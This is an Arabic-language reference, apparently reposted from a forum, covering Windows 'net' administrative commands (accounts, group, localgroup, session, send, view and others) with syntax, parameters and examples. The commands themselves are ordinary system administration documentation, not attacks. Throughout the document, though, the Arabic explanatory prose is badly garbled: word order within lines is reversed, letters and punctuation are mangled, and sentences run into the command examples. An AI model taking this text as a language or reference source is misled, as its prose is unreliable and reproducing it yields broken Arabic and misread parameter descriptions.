> نورة موقع من >منقولبالكلمة تبدأ التي االتصال شبكة أوامر الخدمات من العديد تستخدمnet. أوامر المشتركة net تملك الخصائص بعض :هذه
أوامر بكافة قائمة مشاهدة بكتابة net يمكنك في ?/ net المتوفرةاألوامر .موجه
ألمر األوامر سطر في الجملة بناء تعليمات على الحصول net يمكنككتابة طريق . net help command عن سبيل على األوامر موجه فياألمر تعليمات على للحصول net accounts المثال، ، مايلي :اكتب
net help accountsأوامر كافة األوامر net تقبل على .)ال( n/ و )نعم( y/ خياراتسطراألمر يطالبك المثال، في net stop server سبيل رغبتك بتأكيد
يتجاوز بينما التابعة، الملقم خدمات كافة ،net stop server /y إيقافإيقاف على ويعمل بالتأكيد المطالبة تلقائيا، بنعم اإلجابة طريق عن
الملقم خدمة .تشغيلاالقتباس عالمات استخدم فراغات، على يحتوي الخدمة اسم كان إذا
النص أي( حول ، "Service Name"(. األمر يشغل المثال، سبيل علىخدمة :net logon التالي
net start "net logon"خدمات Net أوامر
Net accounts المرور كلمة ويعدل المستخدمين حسابات بيانات قاعدة يحدث
الحسابات جميع أجل من الدخول تسجيل .ومتطلباتالجملة بناء
net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage ays]
[/uniquepw:number] [/domain]المعلمات
/forcelogoff:{minutes | no}
عمل جلسة إنهاء قبل انتظارها يجب التي الدقائق عدد تعينأو المستخدم حساب صالحية مدة تنتهي عندما ما ملقم مع مستخدم
. االفتراضية القيمة تمنع الصالح الدخول تسجيل وقت ، no ، منالمستخدمين على الخروج .فرضتسجيل
/minpwlen:length حساب مرور كلمة أجل من األحرف لعدد األدنى الحد تعين
بين. ما النطاق يتراوح االفتراضي 127و 0المستخدم ويكون حرفا أحرف ستة .هو
/maxpwage:{days | unlimited} الخاصة المرور كلمة فيها تكون التي األيام لعدد األقصى الحد تعين
. القيمة تعين صالحة المستخدم حد unlimited بحساب ليسهناك أنه . أوامر سطر خيار يكون أن يجب للوقت من maxpwage/ أقصى أكبر
/minpwage. بين ما النطاق 49,710و 1ويترواح يوما ) أن أيunlimited 49,710يكافئ يوما ( ، هي االفتراضية 90والقيمة يوما .
/minpwage ays تغيير من المستخدم يتمكن أن قبل األيام لعدد األدنى الحد تعين
. هي االفتراضية القيمة جديدة مرور أنه 0كلمة تعين والتي يوما، . بين ما النطاق ويتراوح للوقت أدنى حد 49,710و 0ليسهناك يوما .
/uniquepw:number المرات بعدد نفسها المرور كلمة المستخدم يكرر ال أن تتطلب
number . بين ما النطاق يتراوح المرور كلمة تغيير لعمليات 0المعين تكون 24و أن هو واالفتراضي المرور، كلمة تغيير عمليات من
مرور خمسكلمات بمقدار التغيير . عمليات/domain
. الحالي للمجال األساسية المجال تحكم وحدة على العملية تنجزالمحلي, الكمبيوتر على العملية تنفيذ يتم .وإال
net help command ألمر التعليمات .المحدد net تعرض
مالحظاتخدمة • تكون أن حيث Net Logon يجب الكمبيوتر على التشغيل قيد
. يعرض معلمات، دون االستخدام عند الحساب معلمات بتغيير ترغبnet accounts تسجيل وتحديدات المرور، لكلمة الحالية اإلعدادات
المجال ومعلومات .الدخول،استخدام • من تتمكن أن قبل مايلي تنفيذ :net accounts يجب
o . أو المستخدمين إدارة استخدم المستخدمين حسابات net إنشاءuser المستخدمين حسابات .إلعداد
o خدمة من Net Logon تشغيل تتحقق التي الملقمات كافة على . تشغيل يتم المجال في الدخول بدء Net Logon تسجيل عند تلقائيا
.التشغيلاستخدام • forcelogoff:minutes/ عند ، دقائق قبل تحذير إرسال يتم
. يتم المستخدمين على االتصال شبكة من الخروج فرضتسجيل من . إذا مفتوحة ملفات أية هناك كانت إذا فيما المستخدمين إعالم أيضابتسجيل minutes كانت المستخدمين تحذير يتم اثنين، من أقل
فورا االتصال شبكة من .الخروجأمثلة
ما، ملقم ودور المرور، كلمة ومتطلبات الحالية، اإلعدادات لعرض:اكتب
net accountsحسابات مرور لكلمات أحرف بسبعة األدنى الحد لتعيين
اكتب :المستخدمين،
net accounts /minpwlen:7المستخدمين قبل من مرور كلمة استخدام إعادة إمكانية لتعيين
اكتب المرور، كلمات فيها يغيرون التي الخامسة المرة بعد :فقطnet accounts /uniquepw:5
أيام، سبعة كل من أكثر المرور كلمات تغيير من المستخدمين لمنعكل عليهم المرور كلمات تغيير وفرضتسجيل 30وفرض يوما،
مع الدخول تسجيل وقت صالحية مدة انتهاء بعد عليهم الخروجاكتب خمسدقائق، مدته :تحذير
net accounts /minpwage:7 /maxpwage:30 /forcelogoff:5أجل من المفعول سارية السابقة اإلعدادات تكون أن لضمان
اكتب إليه، الكمبيوتر دخول تسجيل تم الذي :المجالnet accounts /minpwage:7 /maxpwage:30 /domain
Net computer مجال بيانات قاعدة من كمبيوتر أجهزة يحذف أو .يضيف
الجملة بناءnet computer \\ComputerName {/add | /del}
المعلمات\\ComputerName
المجال من حذفه أو إضافته لتتم الكمبيوتر .تعين{/add | /del}
المجال من المعين الكمبيوتر تزيل أو .تضيفnet help command
ألمر التعليمات .المحدد net تعرضمالحظات
• Net computer أجهزة وحذف إضافة عمليات كافة توجيه يعيدالمجال تحكم وحدة إلى .الكمبيوتر
أمثلةالكمبيوتر اكتب Grizzlybear إلضافة مجال، :إلى
net computer \\grizzlybear /add
Net config ويغير يعرض أو للتكوين، والقابلة التشغيل قيد الخدمات يعرض
. دون االستخدام عند العمل محطة خدمة أو الملقم خدمة إعداداتيعرض للتكوين net config معلمات، القابلة بالخدمات .قائمة
الجملة بناءnet config [{server|workstation}]
المعلماتserver
بينما عليها تغييرات بإجراء لك وتسمح الملقم خدمة إعدادات تعرضالتشغيل قيد الخدمة .تكون
workstation عليها تغييرات بإجراء لك وتسمح العمل محطة خدمة إعدادات تعرض
التشغيل قيد الخدمة تكون .بينما/?
األوامر موجه في التعليمات .تعرضمالحظات
القابلة net config server استخدم الملقم خدمة إعدادات لتغييرودائمة. الحال في المفعول نافذة التغييرات تكون .للتكوينباستخدام الملقم خدمة إعدادات كافة تغيير يمكنك net config ال
server. يعرض Net config server يمكنك ال التي التالية المعلومات :تكوينها
Server computer name Server comment
Server version ) البرنامج إصدار رقم )أي،Server is active on ) االتصال لشبكة وصف )أي،
Server hidden ) اإلعداد )hidden/ أي،Maximum logged on users ) المستخدمين لعدد األقصى الحد أي،
المشتركة الملقم موارد استخدام يمكنهم )الذينMaximum open files per session ) ملفات لعدد األقصى الحد أي،
العمل جلسة أثناء المستخدمون يفتحها أن يمكن التي )الملقمIdle session time )بالدقائق(
العمل net config workstation استخدم محطة خدمة إعدادات لتغييرللتكوين .القابلة
التالية Net config workstation يعرض :المعلوماتComputer name
Full computer name User name
Workstation active on ) االتصال لشبكة وصف )أي،Software version ) البرنامج إصدار رقم )أي،
Workstation domain Workstation domain DNS name
Logon domain COM open timeout )بالثواني(
COM send count )بالبت( COM send timeout ) ثانية )بالميللي
Net continue بواسطة مؤقت بشكل إيقافها تم خدمة .net pause يتابع
الجملة بناءnet continue service
المعلماتservice
. بعض. التالي الجدول يسرد متابعتها تريد التي الخدمة تعين مطلوبة .service قيم
الوصف القيمةnetlogon خدمة .Net Logon تتابع
"nt lm security support provider" خدمة NT LM Security تتابعSupport Provider.
schedule المهام جدولة خدمة .تتابعserver الملقم خدمة .تتابع
workstation العمل محطة خدمة .تتابعnet help command
ألمر التعليمات .المحدد net تعرضمالحظات
• . مؤقتا الخدمة بإيقاف قم ما، مورد على صغير تصحيح إلجراءاألمر دون net continue استخدم الطابعة، أو الخدمة تنشيط إلعادة
المستخدم اتصاالت .إلغاءكل • بحسب ومتابعتها مؤقتا الخدمة إيقاف تأثير يختلف أن يمكن
.خدمة
عالمات • استخدم فراغات، على يحتوي الخدمة اسم كان إذاالنص ( االقتباسحول المثال سبيل على ، "Service Name"(.
أمثلةالعمل محطة خدمة التالي األمر :يتابعnet continue workstation
اسم تضمين عليك أكثر، أو كلمتين يتألفمن الخدمة اسم كان إذا . خدمة لمتابعة المثال، سبيل على اقتباس عالمات ضمن NT الخدمة
LM Security Support Provider Service ، :اكتبnet continue "nt lm security support provider"
Net file وعدد ما ملقم على المفتوحة المشتركة الملفات كافة يعرضأسماء
. هذا يغلق ملف كل على وجودها، حال في الملفات، تأمين عملياتتأمين عمليات ويزيل الفردية المشتركة الملفات أيضا األمريعرض. معلمات، دون االستخدام عند قائمة net file الملفات
الملقم على المفتوحة .بالملفاتالجملة بناء
net file [ID [/close]]المعلمات
ID الملف تعريف رقم .تعين
/close . األمر هذا اكتب تأمينها تم التي السجالت وتحرر مفتوحا ملفا تغلق
الملف مشاركة تتم حيث الملقم على األوامر موجه .منnet help command
ألمر التعليمات .المحدد net تعرضمالحظات
كتابة أيضا األمر net files يمكنك هذا .لتشغيلاالتصال net file استخدم شبكة على المشتركة الملفات لعرض
. مشتركا ملفا المستخدم يترك بعضاألحيان، في بها والتحكم . ألجهزة يمكن ال هذا، حدوث عند الخطأ بطريق ومؤمنا مفتوحا
المؤمنة األجزاء إلى الوصول االتصال شبكة على األخرى الكمبيوتر . استخدم الملف . net file /close من إن الملف وإغالق التأمين إلزالة
لمايلي net file إخراج :مشابهFile Path Username #locks
-------------------------------------------0 C:\A_FILE.TXT MARYSL 01 C:\DATABASE DEBBIET 2
أمثلةاكتب المشتركة، الملفات حول :لعرضمعلومات
net fileالتعريف رقم لديه ملف اكتب 1إلغالق ، :
net file 1 /close
Net group المجاالت في العمومية المجموعات يعدل أو يعرض، أو .يضيف،
الجملة بناءnet group [groupname [/comment:"text"]] [/domain]
net group [groupname {/add [/comment:"text"] | /delete} [/domain]]
net group [groupname username[ ...] {/add | /delete} [/domain]]المعلمات
groupname . عين حذفها أو توسيعها، أو إضافتها، لتتم المجموعة اسم تعين
فقط المجموعة في المستخدمين قائمة لعرض مجموعة .اسم/comment:"text"
. التعليق يحتوي أن يمكن موجودة أو جديدة لمجموعة تعليقا تضيف. 48على اقتباس عالمات النصضمن بتضمين قم أقصى كحد حرفا .
/domain , . يتم وإال الحالي المجال في المجال تحكم وحدة على العملية تنفذ
المحلي الكمبيوتر على العملية .تنفيذ/add
. تأسيس يجب مجموعة إلى مستخدم اسم تضيف أو تضيفمجموعة،هذا باستخدام المجموعة إلى تضيفهم الذين للمستخدمين حساب
.األمر/delete
مجموعة من مستخدم اسم تزيل أو مجموعة، .تزيلUserName[ ...]
إلى إضافته لتتم المستخدمين أسماء من أكثر أو واحد اسم تسرد . المستخدمين أسماء إدخاالت افصل منها إزالته لتتم أو مجموعة
بفراغات .المتعددةnet help command
ألمر التعليمات .المحدد net تعرضمالحظات
يعرض معلمات، دون االستخدام وأسماء net group عند الملقم اسمعليه الموجودة .المجموعاتكتابة أيضا .net groups يمكنك
شبكة net group استخدم يستخدمون الذين المستخدمين لتجميع . حقوق تعين عندما بنفسالطرق أو متشابهة بطرق االتصال
الحقوق هذه يملك المجموعة في عضو كل فإن ما، لمجموعةيسبق. اإلخراج، في تتضمن net group تلقائيا التي المجموعات
النجمية بالعالمة واحد بآن ومجموعات .)*( مستخدمينلمايلي net group إخراج مشابه الملقم على :للمجموعات
Group Accounts for \\PRODUCTION----------------------------------------------*Domain Admins *Domain Users
أمثلةالمحلي، الملقم على الموجودة المجموعات بكافة قائمة لعرض
:اكتبnet group
تدعى مجموعة المستخدمين nor إلضافة حسابات بيانات قاعدة إلىاكتب :المحلية،
net group NOR /addتدعى مجموعة اكتب nor إلضافة المجال، بيانات قاعدة :إلى
net group NOR /add /domainالموجودة المستخدمين حسابات stevev إلضافة ، ralphr و ، jennyt و
المجموعة اكتب nor إلى المحلي، الكمبيوتر :علىnet group NOR stevev ralphr jennyt /add
الموجودة المستخدمين حسابات stevev إلضافة ، ralphr و ، jennyt والمجموعة اكتب nor إلى المجال، بيانات قاعدة :في
net group NOR stevev ralphr jennyt /add /domainالمجموعة في المستخدمين nor لعرض ، :اكتب
net group NOR
Net help الحصول يمكنك التي االتصال شبكة ومواضيع بأوامر قائمة يوفر
. عند معين أمر حول معلومات يوفر أو بها، الخاصة التعليمات علىيعرض معلمات، دون والمواضيع net help االستخدام باألوامر قائمة
بها الخاصة التعليمات على الحصول يمكنك .التيالجملة بناء
net help [command]المعلمات
command /help
األمر وتعليمات الصحيح الجملة بناء .تعرضبه الخاصة التعليمات تريد الذي األمر .تعين
أمثلةباألمر الخاصة التعليمات net use لعرض ، :اكتب
net help useاكتب :أو
net use /helpلألمر الجملة بناء اكتب net help لعرض :فقط،
net help /?
Net helpmsg المشكلة لحل معلومات ويوفر خطأ حدوث سبب .يفسر
الجملة بناءnet helpmsg message#
المعلماتmessage#
الحصول. تريد التي للرسالة األربعة الخانات ذو الرقم تعين مطلوبةحولها المعلومات من المزيد .على
net help command ألمر التعليمات .المحدد net تعرض
مالحظاتلمايلي مشابهة رسالة تظهر االتصال، شبكة عمل فشل :عند
2182: The requested service has already been started.أمثلة
بالخطأ اإلعالم رسالة حول المعلومات من المزيد على للحصولNET 2182 ، :اكتبnet helpmsg 2182
Net localgroup . االستخدام عند يعدلها أو يعرضها، أو الحلية، المجموعات يضيف
يعرض معلمات، وأسماء net localgroup دون الملقم اسمالكمبيوتر على المحلية .المجموعات
الجملة بناءnet localgroup [GroupName [/comment:"text"]] [/domain]
net localgroup [GroupName {/add [/comment:"text"] | /delete} [/domain]]
net localgroup [GroupName name [ ...] {/add | /delete} [/domain]]المعلمات
GroupName . حذفها أو توسيعها، أو إضافتها، لتتم المحلية المجموعة اسم تعين
يعرض إضافية، معلمات دون االستخدام net localgroup عندGroupName في العمومية المجموعات أو بالمستخدمين قائمة
المحلية .المجموعة/comment:"text"
. التعليق يحتوي أن يمكن موجودة أو جديدة لمجموعة تعليقا تضيف. 48حتى اقتباس عالمات النصضمن بتضمين قم حرفا .
/domain . الحالي للمجال األساسية المجال تحكم وحدة على العملية تنفذ
المحلي, الكمبيوتر على العملية تنفيذ يتم .وإالname [ ...]
المجموعات أو المستخدمين أسماء من أكثر او واحدا اسما تسردمحلية مجموعة من إزالتها أو إضافتها .لتتم
/add . محلية مجموعة إلى مستخدم اسم أو عمومية مجموعة اسم تضيف
العمومية المجموعات أو للمستخدمين تأسيسحساب أوال عليكاألمر هذا بواسطة محلية مجموعة إلى إضافتها من تتمكن أن .قبل
/delete محلية مجموعة من مستخدم اسم أو مجموعة اسم .تزيل
net help command ألمر التعليمات .المحدد net تعرض
مالحظات domain/ استخدام
كمبيوتر domain/ تطبق أجهزة على Windows XP فقطProfessional . كمبيوتر أجهزة تنفذ افتراضيا، ما مجال في األعضاء
األساسية المجال تحكم وحدة على العمليات .الملقم name استخدام
. تكون أن يمكن فراغات باستخدام المتعددة اإلدخاالت افصلعلى مستخدمين أو محليين، مستخدمين عن عبارة األسماء
من تكون أن يمكن ال لكن عمومية، مجموعات أو األخرى، المجاالت . آخر، مجال من المستخدم كان إذا األخرى المحلية المجموعات
المجال باسم المستخدم اسم ( استهل المثال سبيل على ، Sales\Ralphr(.
المستخدمين تجميعيستخدمون net localgroup استخدم الذين المستخدمين لتجميع
. عند بنفسالطرق أو متشابهة بطرق االتصال شبكة أو الكمبيوترالمجموعة في عضو كل فإن محلية، لمجموعة الحقوق تعيين
نفسها الحقوق تلقائيا يملك .المحليةأمثلة
اكتب المحلي، الملقم على المحلية المجموعات بكافة قائمة :لعرضnet localgroup
تدعى محلية مجموعة حسابات Exec إلضافة بيانات قاعدة إلىاكتب المحلية، :المستخدمين
net localgroup exec /addتدعى محلية مجموعة حسابات Exec إلضافة بيانات قاعدة إلى
اكتب المجال، :مستخدميnet localgroup exec /add /domain
الموجودة المستخدمين حسابات stevev إلضافة ، من( ralphr و)Sales المجال ، المحلية jennyt و المجموعة الكمبيوتر Exec إلى على
اكتب :المحلي،net localgroup exec stevev sales\ralphr jennyt /add
الموجودة المستخدمين حسابات stevev إلضافة ، ralphr و ، jennyt والمجموعة اكتب Exec إلى :لمجال،
net localgroup exec stevev ralphr jennyt /add /domainالمحلية المجموعة في المستخدمين :اكتب Exec لعرض
net localgroup execالمحلية المجموعة سجل إلى تعليق Exec إلضافة ، :اكتب
net localgroup exec /comment:"The executive staff."
Net pause حاليا التشغيل قيد للخدمات المؤقت التوقف .يسبب
الجملة بناءnet pause service
المعلماتservice
. التالي. الجدول يسرد مؤقتا إيقافها تريد التي الخدمة تعين مطلوبة .service بعضقيم
الوصف القيمةnetlogon الخدمة إيقاف إلى .مؤقتا Net Logon تؤدي
"nt lm security support provider" الخدمة إيقاف إلى NT LM تؤديSecurity Support Provider مؤقتا.
schedule مؤقتا المهام جدولة إيقافخدمة إلى .تؤديserver مؤقتا الملقم خدمة إيقاف إلى .تؤدي
workstation مؤقتا العمل محطة إيقافخدمة إلى .تؤديnet help command
ألمر التعليمات .المحدد net تعرضمالحظات
استخدم ما، ملقم للسماح net pause على الخدمة إيقاف قبل . التوقف إن بالموارد االتصال قطع أو المهام بإتمام للمستخدمين
من البرنامج يزيل ال لكنه حجز، حالة في يضعها للخدمة المؤقتإنهاء. بالمورد مسبق اتصال لديهم الذين للمستخدمين يمكن الذاكرة
بالمورد الجديدة االتصاالت منع يتم ولكن بهم، الخاصة .المهام أوال قم المشتركة، الموارد على تؤثر خدمة إليقاف تخطط كنت إذا
. استخدم مؤقتا ستعمل net send بإيقافها بأنك تفيد رسالة لبث . من لالنتهاء الكافي بالوقت األشخاص تزويد بعد الخدمة إيقاف على
استخدم المورد، الخدمة net stop استخدام .إليقافاستخدم مؤقتا، إيقافها تم خدمة تنشيط .net continue إلعادة
. على المؤقت التوقف يؤثر مؤقتا الخدمات كافة إيقاف يمكنك الالتالية باألشكال :الخدمات
لخدمة المؤقت اإليقاف معالجة Net Logon إن من الكمبيوتر يمنع . دخول تسجيل ملقمات للمجال كان إذا الدخول تسجيل طلباتشبكة إلى المستخدمين دخول تسجيل يستمر أن يمكن أخرى،
.االتصالإجراء من المستخدمين يمنع الملقم لخدمة المؤقت اإليقاف إن . وجود عدم حال في للملقم المشتركة بالموارد جديدة اتصاالت
يمنع ذلك فإن االتصال، شبكة على أخرى دخول تسجيل ملقمات . تتأثر ال االتصال شبكة إلى الدخول تسجيل من المستخدمين
. الملقم مع اتصاالت إجراء للمسؤولين يمكن الموجودة االتصاالتمؤقت بشكل إيقافه تم إذا .حتى
المستخدم، اسم يحفظ العمل محطة لخدمة المؤقت اإليقاف إنأجل من الطلبات يوجه ولكنه معرفة، واالتصاالت المرور، وكلمة
الطابعات من بدال بالكمبيوتر المتصلة الطابعات إلى الطباعة أجهزةبالشبكة .المتصلة
االقتباس عالمات استخدم فراغات، على يحتوي الخدمة اسم كان إذاالنص ( حول المثال سبيل على ، "Service Name"(.
أمثلةاكتب مؤقت، بشكل الملقم خدمة :إليقاف
net pause serverاسم تضمين عليك أكثر، أو كلمتين يتألفمن الخدمة اسم كان إذا
. الخدمة إليقاف المثال، سبيل على اقتباس عالمات ضمن الخدمة"NT LM Security Support Provider" اكتب :مؤقتا،
net pause "nt lm security support provider"
Net print يعرض أو معينة، طباعة انتظار قائمة حول يعرضمعلومات
من استضافتها تتم التي الطباعة انتظار قوائم كافة حول معلوماتطباعة مهمة حول يعرضمعلومات أو معين، طباعة ملقم قبل
. يعرض معلمات، دون االستخدام عند بها يتحكم أو net print معينة،لألمر األوامر .net print تعليماتسطر
كافة حول أو معينة طباعة انتظار قائمة حول لعرضمعلوماتطباعة ملقم قبل من استضافتها تتم التي الطباعة انتظار قوائم
معينالجملة بناء
net print \\ComputerName[\QueueName]المعلمات
\\ComputerName انتظار. قائمة يستضيف الذي الكمبيوتر االسم، حسب تعين، مطلوبة
بها المتعلقة المعلومات بعرض ترغب التي .الطباعة\QueueName
بعرض ترغب التي الطباعة انتظار قائمة االسم، حسب تعين، . قائمة تعيين وعدم كمبيوتر تعيين حال في بها الخاصة المعلومات
الطباعة انتظار قوائم بكافة المتعلقة المعلومات عرض يتم انتظار،المعين الكمبيوتر .على
net help net print باألمر الخاصة التعليمات .net print تعرض
مالحظاتانتظار Net print يعرض بقوائم المتعلقة المعلومات من أنواع عدة
قوائم. بكافة يتعلق تقرير عن مثال هو التالي المثال الطباعةالمسمى الملقم على الطباعة :NOR2000 انتظارعند الطابعة انتظار NOR2000\\ قوائم
Name Job # Size Status
---------------------------------------------------------
LASER Queue 1 jobs *Queue Active*
USER1 84 0 Spooling
أمثلةالطباعة انتظار قائمة محتويات الكمبيوتر Dotmatrix لسرد \\ على
NOR2000 ، :اكتبnet print \\NOR2000\dotmatrix
بها التحكم أو معينة طباعة مهمة حول لعرضمعلوماتالجملة بناء
net print [\\ComputerName] JobNumber [{/hold | /release | /delete}]المعلمات
\\ComputerName التي الطباعة يستضيفمهمة الذي الكمبيوتر االسم، حسب تعين،
. الكمبيوتر افتراض يتم كمبيوتر، تعين لم إذا بها التحكم تريد .المحلي
JobNumber . تعيين. يتم بها التحكم تريد التي الطباعة مهمة رقم تعين مطلوبة
الطباعة انتظار قائمة يستضيف الذي الكمبيوتر قبل من الرقم هذا . رقما الكمبيوتر يعين أن بعد إليها الطباعة مهمة إرسال تم التي
في أخرى طباعة مهمة ألي الرقم هذا تعيين يتم ال الطباعة، لمهمةالكمبيوتر ذلك قبل من استضافتها تتم انتظار قائمة .أي
{/hold | /release | /delete} . المعلمة تؤخر الطباعة مهمة مع اتخاذه يجب الذي اإلجراء تعين
/hold أن إلى بتجاوزها األخرى الطباعة لمهام يسمح مما المهمة، . المعلمة تحرر تحريرها . release/ يتم تأخيرها تم التي الطباعة مهمةالمعلمة . delete/ تزيل في الطباعة انتظار قائمة من الطباعة مهمة
المعلومات عرض يتم إجراء، أي تعيين وعدم للمهمة رقم تعيين حالالطباعة بمهمة .المتعلقة
net help net print باألمر الخاصة التعليمات .net print تعرض
مالحظاتطباعة بمهمة يتعلق تقرير عن مثال هو التالي :المثال
Job # 20
Status Waiting
Size 309
Remark
Submitting user HISHEM
Notify HISHEM
Job data type
Job parameters
Additional info
أمثلةالرقم ذات المهمة حول الكمبيوتر 20لعرضمعلومات على \\
NOR2000 ، :اكتب
net print \\NOR2000 20 الرقم ذات المهمة الكمبيوتر 20لتأخير على \\NOR2000 ، :اكتب
net print \\NOR2000 20 /holdالرقم ذات المهمة الكمبيوتر 20لتحرير على \\NOR2000 ، :اكتب
net print \\NOR2000 20 /release
Net send أسماء أو كمبيوتر، أجهزة أو مستخدمين، إلى الرسائل يرسل
االتصال شبكة على أخرى .مراسالتالجملة بناء
net send {name | * | /domain[:name] | /users} messageالمعلمات
name التي المراسلة اسم أو الكمبيوتر، اسم أو المستخدم، اسم تعين . تحتوي توفرها التي المعلومات كانت إذا إليها الرسالة إرسال تريدالنص االقتباسحول عالمات استخدم فراغات، ( على سبيل على
المثال ، "Computer Name"(. الطويلة المستخدمين أسماء تؤدي ربماكأسماء استخدامها عند مشاكل حدوث تحديد .NetBIOS إلى يتم
السادسعشر 16بـ NetBIOS أسماء الحرف حجز ويتم حرفا، . *
في أو المجال في الموجودة األسماء كافة إلى الرسالة ترسلبك الخاصة العمل .مجموعة
/domain:name . الكمبيوتر مجال في الموجودة األسماء كافة إلى الرسالة ترسل
تعيين الموجودة name يمكنك األسماء كافة إلى الرسالة إلرسالالمعينة العمل مجموعة في أو المجال .في
/users بالملقم المتصلين المستخدمين كافة إلى الرسالة .ترسل
message الرسالة. نص تعين .مطلوبة
net help command ألمر التعليمات .المحدد net تعرض
مالحظات• . فقط الشبكة على موجود نشط اسم إلى رسالة إرسال يمكنك
تم قد يكون أن يجب مستخدم، اسم إلى الرسالة إرسال حال فيلتلقي المرسل خدمة وتشغيل المستخدم هذا دخول تسجيل
.الرسالةالكمبيوتر • مجال في الموجودة األسماء كافة إلى رسالة بث يمكنك
( الخاصبك أو * )domain/ استخدم ، مختلف مجال في أو)/domain:DomainName(. على البث رسائل تحتوي أن 128يمكن
. مستخدمين عدة إلى الرسائل إرسال عند انتبه أقصى كحد .حرفالك • الذين users/ تسمح المستخدمين كافة إلى رسالة بإرسال
. عدة إلى الرسائل إرسال عند انتبه الملقم مع عمل جلسات لديهم .مستخدمين
• . من لمزيد الرسائل استالم ليتم المرسل خدمة تشغيل يجبصلة ذات مواضيع راجع خدمة، تشغيل كيفية حول .المعلومات
أمثلةالرسالة إلى ".Meeting changed to 3 P.M. Same place" إلرسال
robertf المستخدم ، :اكتبnet send robertf Meeting changed to 3 P.M. Same place.
اكتب بالملقم، المتصلين المستخدمين كافة إلى رسالة :إلرسالnet send /users This server will shut down in 5 minutes.
اكتب )/( ، المائل الخط عالمة تتضمن رسالة :إلرسالnet send robertf "Format your disk with FORMAT /4"
Net session . دون االستخدام عند الملقمات كمبيوتر أجهزة اتصاالت يدير
يعرض مع net session معلمات، العمل جلسات كافة حول معلوماتالمحلي .الكمبيوتر
الجملة بناءnet session [\\ComputerName] [/delete]
المعلمات\\ComputerName
قطع أو العمل جلسات سرد تريد أجله من الذي الكمبيوتر تعرف .اتصالها/delete
مع الكمبيوتر عمل جلسة كافة ComputerName تنهي وتغلق . تم إذا هذه العمل جلسة أجل من الكمبيوتر على المفتوحة الملفات
ComputerName حذف ، الكمبيوتر على العمل جلسات كافة إلغاء يتم .المحلي
net help command ألمر التعليمات .المحدد net تعرض
تحذيراستخدام . net session إن ربما البيانات فقدان إلى يؤدي أن يمكنالعمل جلسة اتصال قطع قبل المستخدمين بتحذير .ترغب
مالحظاتاستخدام أيضا net لتشغيل net sess أو net sessions يمكنك
session. وأسماء net session استخدم الكمبيوتر أجهزة لعرضأسماء
إذا ما ولمعرفة الملقم، على الموجودين للمستخدمين المستخدمينتعطيل مدة ولمعرفة مفتوحة، ملفات المستخدمين لدى كان
مستخدم لكل العمل .جلساتلمايلي مشابه بتنسيق المعلومات :تظهر
Computer User name Client type Opens Idle time
------------------------------------------------------------------------\\BASSETT CHRISDR Windows 2000 1 00:00:13
\\SHARONCA Administrator DOS LM 2.1 0 01:05:13استخدم واحد، مستخدم عمل مع ComputerName لعرضجلسة
بالموارد. قائمة وحيد بمستخدم المتعلقة المعلومات تتضمن األمرالمستخدم بها يتصل التي .المشتركة
على الموجود المستخدم يتصل عندما العمل جلسة تسجيل يتم . عندما الناجحة العمل جلسة تحدث بالملقم ناحج بشكل العميل
يكون وعندما نفسالشبكة، على موجودين الكمبيوتر جهازي يكون . أن يجب الملقم قبل من مقبولين مرور وكلمة اسم المستخدم لدى
الملقم مع عمل جلسة العميل على الموجود المستخدم لدى يكونالعمل تأسيسجلسة يتم وال الملقم، موارد استخدام إمكانية قبل
. بين يكون ما بمورد العميل على الموجود المستخدم يتصل أن إلىيكون أن يمكن ولكن فقط، واحدة عمل جلسة والملقم العميل
بالموارد االتصاالت، أو اإلدخال، نقاط من العديد .لديهما
قبل معطلة العمل جلسة خالله تبقى أن يمكن الذي الوقت لتعيينالميزة عين تلقائيا، اتصالها قطع يتم باستخدام autodisconnect أن
net config server /autodisconnect. حول المعلومات من net لمزيدconfig server ، . التلقائي االتصال قطع يكون صلة ذات مواضيع راجع
تلقائيا العمل جلسة اتصال إعادة تتم ألنه للمستخدم بالنسبة شفافاثانية مرة المورد إلى المستخدم يصل .عندما
استخدم الملقم، مع العمل جلسة \\ net session إلنهاءComputerName /delete.
أمثلةاكتب المحلي، للملقم العمل جلسة معلومات عن :لعرضسرد
net sessionالكمبيوتر اسم ذو للعميل العمل جلسة ،Shepherd لعرضمعلومات
:اكتبnet session \\shepherd
اكتب به، المتصلين والعمالء الملقم بين العمل جلسات كافة :إلنهاءnet session /delete
Net statistics أو المحلية، العمل محطة أو الملقم لخدمة اإلحصائيات يعرضسجل
. االستخدام عند لها اإلحصائيات تتوفر والتي التشغيل قيد للخدماتيسرد معلمات، تتوفر net statistics دون التي التشغيل قيد الخدمات
لها .اإلحصائياتالجملة بناء
net statistics [{workstation | server}]المعلمات
workstation المحلية العمل محطة خدمة إحصائيات .تعرض
server المحلي الملقم خدمة إحصائيات .تعرض
net help command ألمر التعليمات المحدد net تعرض
Net view تتم التي الموارد أو الكمبيوتر، أجهزة أو المجاالت، قائمة يعرض
. معلمات، دون االستخدام عند المعين الكمبيوتر قبل من مشاركتهاالمجال net view يعرض في الموجودة الكمبيوتر بأجهزة قائمة
.الحاليالجملة بناء
net view [\\ComputerName] [/domain[:DomainName]]net view /network:nw [\\ComputerName]
المعلمات\\ComputerName
تريد التي المشتركة الموارد على يحتوي الذي الكمبيوتر تعين .عرضها
/domain[:DomainName] . تم إذا فيه المتوفرة الكمبيوتر عرضأجهزة تريد الذي المجال تعينDomainName حذف ، في domain/ يعرض الموجودة المجاالت كافة
.الشبكة/network:nw
شبكة على المتوفرة الملقمات كافة حال .NetWare تعرض في
يعرض كمبيوتر، اسم ذلك network:nw/ تعيين على المتوفرة المواردشبكة في االتصال .NetWare الكمبيوتر شبكات تعيين أيضا يمكنك
النظام إلى إضافتها تمت التي .األخرىnet help command
ألمر التعليمات .المحدد net تعرضمالحظات
األمر . net view استخدم يكون الكمبيوتر بأجهزة قائمة لعرضلمايلي مشابها :اإلخراج
Server Name Remark-------------------------------------------------\\Production Production file server
\\Print1 Printer room, first floor\\Print2 Printer room, second floor
أمثلةالكمبيوتر قبل من المشتركة بالموارد قائمة ،Production\\ لمشاهدة
:اكتبnet view \\production
ملقم على المتوفرة الموارد \\ المسمى NetWare لمشاهدةMarketing ، :اكتب
net view /network:nw \\marketingمجموعة أو مجال في الموجودة الكمبيوتر بأجهزة قائمة لمشاهدة
sales عمل ، :اكتبnet view /domain:sales
شبكة في الملقمات كافة NetWare لمشاهدة ، :اكتبnet view /network:nw
11." الـ "secure shellشرح> مصر ابن منتديات من >منقول
>ACID BURN_EG :الكاتب<بركاته و الله رحمه و عليكم : السالم
